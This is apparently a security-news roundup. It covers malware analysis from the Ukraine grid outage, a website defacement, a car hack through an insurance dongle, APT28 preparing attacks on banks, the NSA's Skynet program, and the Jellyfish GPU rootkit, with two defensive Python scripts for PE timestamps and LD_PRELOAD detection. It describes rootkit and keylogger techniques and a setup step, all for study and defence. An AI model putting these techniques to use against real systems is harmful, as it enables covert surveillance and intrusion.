The malware is a 32 bit Windows executable and is modular in nature indicating that this is a module of a more complex piece of malware. I passed the malware sample to Kyle Wilhoit, a Senior Threat Researcher at Trend Micro who has done great work in the ICS community before, who confirmed through static analysis that the malware itself has a wiping routine that would impact the infected system. After that I passed the sample to Jake Williams, founder of Rendition Security and a fellow SANS Instructor, who has been analyzing this incident as well for further support. Below is his analysis:



Note that this analysis is based on an extremely limited static analysis of the malware and further analysis may impact these findings. The code appears modular in nature. The attackers take steps to obscure some notable suspicious APIs (e.g. OpenSCManager) from the imports table, but not others (e.g. CreateToolhelp32Snapshot). The string “obfuscation” method is crude and obvious upon manual examination, but effective to thwart string matching. Any of these hyphen separated strings would make an excellent Yara rule.

[Image: malware-ukraine]

Notably, the malware does not appear to use all of the functions it imports. Specifically, there are no cross references to service related calls. While this may be due to dynamic call targets, there are significant numbers of cross references to other dynamically resolved APIs (e.g. RegDeleteKey).

The resolution of APIs that are not used elsewhere in the code probably means that some of the code was borrowed from another program. This hints at a development shop with a code base from which to piece modules together. Although the string obfuscation was crude, it was sufficient for the task. The crude string obfuscation should not be taken as an indication that the attacks came from a non-state actor.

Another possible interesting note is the compile timestamp of the executable. It is set to January 6, 1999.

[Image: timestamp-ukraine]

This was likely modified by the attackers, but whether this date is significant in historical context is unknown at this time. It may simply be a random modification.
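Reading the compile timestamp is a routine triage step, and the “January 6, 1999” observation above is the kind of result it produces. The following is an added example for this page, not code from SANS ICS or Rendition Security: it walks the DOS header to e_lfanew, checks the PE signature, reads the COFF TimeDateStamp, and applies a plausibility check against the date the sample was observed. The PE header bytes are constructed (no sections, no real code), and the sanity floor of 2005 is an assumed value to set per environment.

```python
import struct
from datetime import datetime, timezone

# Added example; not SANS ICS or Rendition Security code. Reads the COFF
# TimeDateStamp from a PE file and flags stamps that are implausibly old or
# later than the date the sample was observed. The PE bytes are constructed.

EARLIEST_PLAUSIBLE_YEAR = 2005   # assumed sanity floor; tune per environment


def pe_timestamp(data: bytes) -> datetime:
    """Return the COFF TimeDateStamp of a PE image as a UTC datetime."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file: missing PE signature")
    # COFF header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def timestamp_looks_forged(stamp: datetime, observed: datetime,
                           earliest_year: int = EARLIEST_PLAUSIBLE_YEAR) -> bool:
    """True when the stamp predates the sanity floor or postdates first sighting."""
    return stamp.year < earliest_year or stamp > observed


def build_pe_stub(timestamp: int) -> bytes:
    """Construct the minimal header bytes the parser needs (no real sections)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)        # e_lfanew: PE header at offset 64
    # Machine=i386, 0 sections, TimeDateStamp, no symbols, no optional header,
    # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 0, timestamp, 0, 0, 0, 0x102)
    return bytes(dos) + b"PE\x00\x00" + coff


# Constructed values: the 1999-01-06 stamp reported above, a recent stamp for
# comparison, and the date the sample was submitted to VirusTotal.
SAMPLE_STAMP = int(datetime(1999, 1, 6, tzinfo=timezone.utc).timestamp())
RECENT_STAMP = int(datetime(2015, 11, 2, tzinfo=timezone.utc).timestamp())
OBSERVED = datetime(2015, 12, 23, tzinfo=timezone.utc)

if __name__ == "__main__":
    for label, stamp in [("sample", SAMPLE_STAMP), ("recent", RECENT_STAMP)]:
        ts = pe_timestamp(build_pe_stub(stamp))
        print(f"{label}: {ts.isoformat()} forged? {timestamp_looks_forged(ts, OBSERVED)}")
```

A forged stamp is not attribution evidence on its own; it only says the build date cannot be trusted for timeline reconstruction, so lean on file-system and log timestamps instead.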


 

There are at least 3 major cybersecurity vendors working on the piece of malware right now in their own analysis and I will simply state that I’m impressed with the quality of work from them I have seen so far. Additionally, folks at the ICS-CERT and E-ISAC are doing great analysis as well and will likely be pushing out information through government sharing channels soon. Simply put, a lot will be known about this in the community soon to further support the analysis or help move on to a better understanding.

The Speculation

It is not currently possible to state that the malware recovered caused the loss of power in Ukraine. Additionally, the wiping functionality of the recovered module is most likely for cleanup after the attack; the module itself does not appear to have been capable of causing the outage. This is important to note: the wiping capability is not similar in nature to the Shamoon attack but is instead an anti-forensics technique.

Also, it is possible that the incident caused responders to look at the network, where they found the malware. The malware could be new and yet not be related to the incident. At this time I believe the malware is related to the incident, based on analysis by the SANS ICS team and others around the community, but this should currently be categorized as a low-confidence assessment.

There has also been speculation that the malware is related to, and potentially a module for, BlackEnergy2. The previous statement should not be taken as a standalone soundbite. There is very little to support this conclusion right now. If true though this would add credibility to Ukraine’s SBU who reported that the malware was launched by Russian security services. Because of the sources concluding the BlackEnergy2 connection I feel it is important to share the (potentially overstated) speculation with the community as there were many organizations around the global community who were impacted by that campaign. Just because a campaign is reported on publicly does not mean it is no longer active. Security personnel in ICS organizations should be actively looking for threats — the Ukrainian incident should not be seen as an incident that only impacts one site in a foreign country although no panic or alarm should be taken, only due diligence towards defense.

The Takeaways

  • There is a lot of great analysis going on in the community by a number of companies, government organizations, and individual researchers. Each have been contributing some unique aspects to the analysis. Defenders must always work together like this and build off of each other’s strengths. Information sharing in this manner is critical to security.
  • The Ukrainian power outage is more likely to have been caused by a cyber attack than previously thought. Early reporting was not conclusive, but a sample of malware taken from the network bolsters the claims. The unique nature of the malware indicates that some level of targeting may be possible, but much more information is needed to confirm that targeting of ICS or this specific facility was intended.
    • If the malware does end up being related to the BlackEnergy2 campaign then this adds to the possibility that the facility and ICS was specifically targeted
    • Technical data alone is very rarely enough to conclude the intention of an adversary
  • ICS facilities around the world need to take an active defense approach to monitoring ICS networks and responding to threats. Additionally, each should have an ability, or at least contacts to request help from, to perform basic threat and malware analysis to know when to reach out for help to the larger community (my one plug: the identification of, response to, and analysis of threats is the type of skill set we teach in SANS ICS515 and I would encourage organizations to find this or similar type of training for security personnel onsite. Firewalls and boxes on the network alone will not protect an ICS fully).

This incident is an important case study for the ICS community. If the analysis and follow-on information about the malware and attack is validated, then this will also be a significant event for the international community. The precedent that this event sets reaches far past the security community and will need to be analyzed and understood fully. The response by countries to this type of attack, and any attribution obtained, will also be significant in establishing the precedent for these types of events moving forward in the international community.

Credit: sans, motherboard

Pro-Palestinian Hackers Took over Radio Tel Aviv Website

A group of pro-Palestinian hackers took over the official website of Radio Tel Aviv (TLV) on Sunday and left a deface page on the homepage showing anti-Israeli messages.

A group of Palestinian-friendly hackers going with the handle of AnonCoders hacked and defaced the official website of Radio Tel Aviv.

Hackers left a deface page along with messages both in support of Palestine and against Israel and Zionism.

The Israeli newspaper YT News reports that the deface page uploaded by the group remained on Radio Tel Aviv’s website for more than a day before it was removed by the site’s admin. However, the radio transmission remained unharmed.

The message on the website described why the site was targeted:

“Because we are the voice of Palestine and we will not remain silent. And our main target is Zionism and Israhell, if you are asking why your website got hacked by us, it’s basically because we want to share our message.”

A full preview of the deface page is available below:

[Image: pro-palestinian-hackers-took-over-radio-tel-aviv-website]

The link to the targeted website, along with its zone-h mirror as proof of the hack, is available below:

http://102fm.co.il/
http://zone-h.org/mirror/id/24931127?zh=1

This is not the first time that pro-Palestinian hackers have taken over an Israeli entertainment service provider. In the past, the cyber wing of Hamas hacked the official TV broadcasts of Israeli Channel 2 and Channel 10 for a short period of time.

In 2013, Israel’s major traffic tunnel was hit by a massive cyber-attack, causing huge financial damage.

In March 2014, Al-Qassam hackers from Palestine compromised the IsraelDefense magazine database and its website to launch an SMS attack on Israeli journalists.

Credit:

Researchers Hack Car via Insurance Dongle

Small devices installed in many automobiles allow remote attackers to hack into a car’s systems and take control of various functions, researchers have demonstrated.

Researchers at the University of California, San Diego analyzed commercial telematics control units (TCUs) to determine whether they are vulnerable to cyberattacks.

TCUs are embedded systems on board a vehicle that provide a wide range of functions. The products offered by carmakers, such as GM’s OnStar and Ford’s Sync, provide voice and data communications, navigation, and allow users to remotely control the infotainment systems and other features.

Aftermarket TCUs, which connect to the vehicle through the standard On-Board Diagnostics (OBD) port, can serve various purposes, including driving assistance, vehicle diagnostics, security, and fleet management. These devices are also used by insurance companies that offer safe driving and low mileage discounts, and pay-per-mile insurance.

The researchers conducted tests on C4E dongles produced by France-based Mobile Devices. These TCUs, acquired by the experts from eBay, are used by the San Francisco-based car insurance firm Metromile, which offers its per-mile insurance option to Uber.

Aftermarket TCUs are mostly used for data collection, but the OBD-II port they are connected to also provides access to the car’s internal networks, specifically the controller area network (CAN) buses that are used to connect individual systems and sensors.

“CAN is a multi-master bus and thus any device with a CAN transceiver is able to send messages as well as receive. This presents a key security problem since as we, and others, have shown, transmit access to the CAN bus is frequently sufficient to obtain arbitrary control over all key vehicular systems (including throttle and brakes),” researchers explained in their paper.

The experts have identified several vulnerabilities in the Mobile Devices product, including the lack of authentication for remotely accessible debug services, the use of hard-coded cryptographic keys (CVE-2015-2906) and hard-coded credentials (CVE-2015-2907), the use of SMS messages for remotely updating the dongle, and the lack of firmware update validation (CVE-2015-2908).

In their experiments, researchers managed to gain local access to the system via the device’s USB port, and remote access via the cellular data interface that provides Internet connectivity and via an SMS interface.

In a real-world demonstration, the experts hacked a Corvette fitted with a vulnerable device simply by sending it specially crafted SMS messages. By starting a reverse shell on the system, they managed to control the windshield wipers, and apply and disable brakes while the car was in motion. The experts said they could have also accessed various other features.

[Image: Corvette hacked via insurance dongle]

The remote attacks only work if the attacker knows the IP address of the device or the phone number associated with the SIM card used for receiving SMS messages. However, researchers determined that Internet-accessible TCUs can be identified by searching the web for strings of words unique to their web interface, or by searching for information related to the Telnet and SSH servers. Thousands of potential TCUs were uncovered by experts using this method.

As for the SIM phone numbers, researchers believe many of them are sequentially assigned, which means an attacker who determines the phone number of one device might be able to derive the numbers of others.

Researchers have reported their findings to Mobile Devices, Metromile, and Uber. Wired reported that Mobile Devices developed a patch that has been distributed by Metromile and Uber to affected products.

Mobile Devices told the researchers and the CERT Coordination Center at Carnegie Mellon University that many of the vulnerabilities have been fixed in newer versions of the software, and claimed that the attack described by experts should only work on developer/debugging devices, not on production deployments.

However, researchers noted that they discovered the vulnerabilities on recent production devices and they had not found the newer versions of software that should patch the security holes.

This is not the first time someone has taken control of a car using insurance dongles. In January, a researcher demonstrated that a device from Progressive Insurance used in more than two million vehicles was plagued by vulnerabilities that could have been exploited to remotely unlock doors, start the car, and collect engine information.

White hat hackers demonstrated on several occasions this summer that connected cars can be hacked. Charlie Miller and Chris Valasek remotely hijacked a Jeep, ultimately forcing Fiat Chrysler to recall 1.4 million vehicles to update their software. Last week, researchers reported finding several vulnerabilities in Tesla Model S, but they applauded the carmaker for its security architecture.

In July, senators Ed Markey and Richard Blumenthal introduced new legislation, the Security and Privacy in Your Car (SPY Car) Act, in an effort to establish federal standards to secure cars and protect drivers’ privacy.

Credit: Eduard Kovacs

Russian cyber group seen preparing to attack banks

A security firm is warning that a group of Russian hackers known for targeting military, government and media organizations is now preparing to attack banks in the U.S. and elsewhere.

The group’s preparations, which have included writing new malware, registering domain names similar to those of intended targets, and setting up command-and-control servers, were discovered by analysts from security firm Root9B.

The group has been active since at least 2007 and is known by various names including APT28 and Pawn Storm. Several security vendors believe it operates out of Russia and has possible ties to that country’s intelligence agencies.

The group’s primary malware tool is a backdoor program called Sednit or Sofacy that it delivers to victims through spear-phishing emails or drive-by downloads launched from compromised websites.

The Root9B analysts came across a phishing domain at the end of April that was similar to that of a Middle Eastern financial institution, according to a report published Tuesday. When they dug deeper they uncovered new Sofacy malware samples and servers and domains that were being set up by the group for an upcoming operation.

Based on the information gathered so far, Root9B believes the group’s planned targets include Commercial Bank International in the UAE, Bank of America, TD Canada Trust, the United Nations Children’s Fund (UNICEF), United Bank for Africa, Regions Bank, and possibly Commerzbank.

The company has alerted the financial institutions, as well as international and U.S. authorities. It’s not clear if the attacks have started yet, but the Root9B analysts believe that when they do, they will likely include spear-phishing.

The company released hashes for the new malware samples it has identified and the IP address of a command-and-control server set up by the attackers, so that companies can block them on their networks.

Based on the evidence they’ve seen, the Root9B analysts believe that there might be two subgroups within APT28: One that targets military and government organizations and one that targets financial institutions and banks.

Of course, the attackers might now decide to delay the operation in order to change their infrastructure and targets. So, financial institutions should remain vigilant and should examine all email messages for possible spear-phishing attempts.

By Lucian Constantin

Skynet actually exists!!! Skynet is a top secret program of NSA

National Security Agency (NSA) actually has a real program named Skynet

Skynet was the evil military computer system that launches a war on the human race in the Terminator movie franchise; it has now been learnt that the NSA has a program with the same name.

As per The Intercept’s reports, the NSA does have a program called Skynet. However, it has less lethal but legally dubious aims. It is a surveillance program that uses phone metadata to record the call activity and location of suspected terrorists. An Al Jazeera journalist reportedly became one of its victims after he was put on a terrorist watch list.

Ahmad Muaffaq Zaidan, bureau chief of Al Jazeera’s Islamabad office, was traced by Skynet after he was flagged by US intelligence as a possible Al Qaeda member and given a watch list number. Zaidan, a Syrian national, has conducted a number of exclusive interviews with senior Al Qaeda leaders, including Osama bin Laden himself.

According to a 2012 government presentation that The Intercept obtained from Edward Snowden, Skynet uses phone location and call metadata from bulk phone call records to identify suspicious patterns in the communication habits and physical movements of suspects.

Says Wired:

The presentation indicates that SKYNET looks for terrorist connections based on questions such as “who has traveled from Peshawar to Faisalabad or Lahore (and back) in the past month? Who does the traveler call when he arrives?” It also looks for suspicious behaviors such as someone who engages in “excessive SIM or handset swapping” or receives “incoming calls only.” The goal is to identify people who move around in a pattern similar to Al Qaeda couriers who are used to pass communication and intelligence between the group’s senior leaders.

In addition to its misleading name, SKYNET has a few problems though. It happened to misidentify an Al-Jazeera reporter as a member of al-Qaida based on the criteria mentioned above. (It seems that journalists meeting with sources and terrorists meeting with terrorist group leaders move in patterns that look the same to the computer.) This misidentification would be disturbing even if the government did not make use of such metadata to make life-and-death decisions about who to kill with drone strikes. However, it does.

The NSA, one should note, has a second program too that is very similar to the Terminator’s Skynet. As revealed by Edward Snowden in an interview with WIRED and James Bamford last year, this one is called MonsterMind. Like the film version of Skynet, MonsterMind is a defensive surveillance system that would immediately and independently disarm foreign cyberattacks against the US, and could be used to launch retaliatory strikes as well. Algorithms under this program would comb through massive repositories of metadata to distinguish normal network traffic from anomalous or malicious traffic. Equipped with this knowledge, the NSA could immediately and autonomously find and block a foreign threat.

Snowden also stated that MonsterMind could one day be designed to automatically return fire against an attacker without human intervention. Because an attacker could tweak malicious code to evade detection, a counterstrike would be more successful in neutralizing future attacks. Sounds a lot like Skynet. However, there is no word from the NSA on why the iconic film name was used for its real-world Skynet.

If you ask me, some quite serious guys seem to be involved in the program:

Arnold Schwarzenegger, who later became governor of California.

Credit: Kavita Iyer

New GPU-based Linux Rootkit and Keylogger | Proof-of-concept GPU rootkit hides in VRAM, snoops system activities

A team of coders has published a new “educational” rootkit, dubbed Jellyfish, that is virtually undetectable by current software practices. Their work is designed to demonstrate that GPUs, which have become considerably more powerful and flexible over the past decade, are now capable of running keyloggers and rootkits.

The world of hacking has become more organized and reliable over recent years, and so have the techniques of hackers.
Nowadays, attackers use highly sophisticated tactics and often go to extraordinary lengths in order to mount an attack.
And there is something new to the list:
A team of developers has created not one, but two pieces of malware that run on an infected computer’s graphics processor unit (GPU) instead of its central processor unit (CPU), in order to enhance their stealthiness and computational efficiency.

The two pieces of malware:

The source code of both the Jellyfish rootkit and the Demon keylogger, which are described as proof-of-concept malware, has been published on GitHub.
Until now, security researchers have discovered nasty malware running on the CPU and exploiting the GPU’s capabilities in an attempt to mine cryptocurrencies such as Bitcoin.
However, these two pieces of malware can operate without exploiting or modifying processes in the operating system kernel, which is why they do not trigger any suspicion that a system is infected and remain hidden.

JELLYFISH ROOTKIT

Jellyfish is capable of running on Nvidia, AMD, and Intel hardware (this last thanks to support from AMD’s APP SDK). The advantage of using a GPU to perform system snooping and keylogging is substantial. If you stop and think about it, there are a variety of methods to determine exactly what is running on your CPU. From the Windows Task Manager to applications like Process Explorer, there are built-in or free tools that will help you isolate exactly which processes are being called and what those processes are doing. Malware detection software is more complex, but it offers an even deeper window into process analysis.

Contrast that with GPUs. In terms of freeware utilities, you’ve got GPU-Z and a handful of other applications that provide a similar “GPU Load” monitoring function. Nvidia, AMD, and Intel all provide some basic profiling tools that can be used to analyze a GPU’s performance in a specific application, but these toolkits plug into existing software packages, like Visual Studio. They don’t take a snapshot of what’s running on the GPU in general — they allow you to monitor code that you’ve explicitly told to run on the GPU.

[Image: GPU-malware]

Hackers and researchers have been exploring more of what a GPU can be used for and come away with some interesting results, including a project last year that turned a graphics card into a keylogger. As they noted at the time, “By instructing the GPU to carefully monitor via DMA the physical page where the keyboard buffer resides, a GPU-based keylogger can record all user keystrokes and store them in the memory space of the GPU.”

For those of you wondering about using a simple GPU load monitor to catch this work, it’s not really feasible — the estimated CPU and GPU utilization was ~0.1%. The Jellyfish rootkit discussed above doesn’t just have the ability to transmit information back across a network — it can theoretically remain resident in between warm reboots of the target system.

New GPU-based Linux Rootkit and Keylogger with Excellent Stealth and Computing Power

Jellyfish rootkit is proof-of-concept malware designed to show that running malware on GPUs is practically possible, as dedicated graphics cards have their own processors and memory.
These types of rootkits could snoop on the CPU host memory through DMA (direct memory access), which allows hardware components to read the main system memory without going through the CPU, making such actions harder to detect.

The pseudo-anonymous developers describe their Jellyfish Rootkit as:

Jellyfish is a Linux based userland gpu rootkit proof of concept project utilizing the LD_PRELOAD technique from Jynx (CPU), as well as the OpenCL API developed by Khronos group (GPU). Code currently supports AMD and NVIDIA graphics cards. However, the AMDAPPSDK does support Intel as well.

Advantages of GPU stored memory:

  • No GPU malware analysis tools are available on the Internet
  • Can snoop on CPU host memory via DMA (direct memory access)
  • GPU can be used for fast/swift mathematical calculations like parsing or XORing
  • Stubs
  • Malicious memory is still inside GPU after device shutdown

Requirements for use:

  • Have OpenCL drivers/icds installed
  • Nvidia or AMD graphics card (Intel supports AMD’s SDK)
  • Change line 103 in rootkit/kit.c to server ip you want to monitor GPU client from

Stay tuned for more features:

  • client listener; let buffers stay stored in GPU until you send a magic packet from the server

The anonymous developers of the rootkit warn that Jellyfish is proof-of-concept malware and still a work in progress, so it may contain flaws. The code published on GitHub is intended for educational purposes only.

DEMON KEYLOGGER

Moreover, the developers also built a separate GPU-based keylogger, dubbed Demon, though they did not provide any technical details about the tool.
The Demon keylogger is also a proof of concept, inspired by the malware described in a 2013 academic research paper [PDF] titled “You Can Type, but You Can’t Hide: A Stealthy GPU-based Keylogger,” but the developers stressed that they were not working with the researchers.
“We are not associated with the creators of this paper,” the Demon developers said. “We only PoC’d what was described in it, plus a little more.”
As described in the research paper, the GPU-based keystroke logger consists of two main components:
  • A CPU-based component that is executed once, during the bootstrap phase, with the task of locating the address of the keyboard buffer in main memory.
  • A GPU-based component that monitors the keyboard buffer via DMA and records all keystroke events.
Users need not worry about cyber criminals or hackers using GPU-based malware yet, but proof-of-concept malware such as the Jellyfish rootkit and Demon keylogger could inspire future developments.

How do we fix this?

It seems likely that malware detection methods will have to evolve to scan the GPU as well as the CPU, but it’s not clear how easy that’s going to be. The keylogger research team noted that Nvidia’s CUDA environment did offer the ability to attach to a running process and monitor its actions, but states that this is currently Nvidia-specific and of only limited (though important) use.

Software detection methods are going to need to fundamentally step up their game. Malware researchers tend to use virtual machines (for all the reasons you’d imagine), but these applications are not designed to support GPU API virtualization. That’s going to need to change if we’re going to protect systems from code running on GPUs.

Given the fact that code running on the GPU is almost untraceable today, it wouldn’t surprise me in the slightest to discover that state governments had already exploited these detection weaknesses. White hats, start your engines. Jellyfish is a Linux utility for now, but nothing in the literature suggests that this issue is unique to that operating system.
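The GPU-resident payload is the hard part to see, but the description of Jellyfish above gives a host-side handle: it is a userland rootkit loaded through LD_PRELOAD (the Jynx technique) that talks to the card through the OpenCL API, so a process that combines a preloaded library with a loaded OpenCL or CUDA runtime is worth a look. The Python below is an added triage check, not part of Jellyfish or of any detection product; the library names it matches and the /proc samples in demo() are constructed for illustration, and the live scan_proc() function simply applies the same logic to a running Linux host.

```python
import os
import re

# Shared-object names that indicate use of GPU compute APIs (OpenCL, CUDA).
# Assumed names for this example; extend for the runtimes present on your hosts.
GPU_LIBS = re.compile(r"/lib(OpenCL|cuda|nvidia-opencl|amdocl\w*)\.so", re.ASCII)


def ld_so_preload_entries(text: str) -> list:
    """Parse /etc/ld.so.preload: whitespace-separated library paths, '#' comments allowed."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            entries.extend(line.split())
    return entries


def preload_from_environ(environ: bytes) -> list:
    """Extract LD_PRELOAD entries from a /proc/<pid>/environ blob (NUL-separated KEY=VALUE)."""
    for item in environ.split(b"\0"):
        if item.startswith(b"LD_PRELOAD="):
            value = item[len(b"LD_PRELOAD="):].decode(errors="replace")
            return [p for p in re.split(r"[:\s]+", value) if p]
    return []


def gpu_libs_in_maps(maps: str) -> set:
    """Return the GPU runtime libraries mapped into a process, from /proc/<pid>/maps text."""
    return {m.group(0) for m in GPU_LIBS.finditer(maps)}


def assess_process(environ: bytes, maps: str, system_preload: list) -> dict:
    """Flag a process that has a preloaded library (per-process or system-wide)
    and a GPU compute runtime mapped at the same time."""
    preload = preload_from_environ(environ) + list(system_preload)
    gpu = gpu_libs_in_maps(maps)
    return {"preload": preload, "gpu_libs": sorted(gpu),
            "suspicious": bool(preload) and bool(gpu)}


def scan_proc(proc: str = "/proc") -> dict:
    """Live scan (Linux only): apply assess_process to every readable pid."""
    try:
        with open("/etc/ld.so.preload") as f:
            system_preload = ld_so_preload_entries(f.read())
    except OSError:
        system_preload = []
    findings = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(f"{proc}/{pid}/environ", "rb") as f:
                env = f.read()
            with open(f"{proc}/{pid}/maps") as f:
                maps = f.read()
        except OSError:
            continue                      # process exited or not ours to read
        result = assess_process(env, maps, system_preload)
        if result["preload"]:             # report every preload; mark the GPU-using ones
            findings[int(pid)] = result
    return findings


def demo() -> dict:
    """Constructed /proc excerpts (not from a real infection) showing both outcomes."""
    maps = ("7f0a r-xp 00000000 08:01 1 /usr/lib/x86_64-linux-gnu/libOpenCL.so.1\n"
            "7f0b r-xp 00000000 08:01 2 /usr/lib/x86_64-linux-gnu/libc.so.6\n")
    hooked = b"PATH=/usr/bin\0LD_PRELOAD=/tmp/.x/kit.so\0HOME=/root\0"   # constructed path
    clean = b"PATH=/usr/bin\0HOME=/root\0"
    return {"hooked": assess_process(hooked, maps, []),
            "clean": assess_process(clean, maps, [])}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

This only sees the loader side: a library that has already been preloaded can hook the very reads of /proc the script performs, and the page notes that the GPU buffers persist independently of the host process. Run it from a trusted environment, and treat a hit as a reason to pull the process's mapped files for analysis rather than as a verdict.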

 

 

 

Credit: extremetech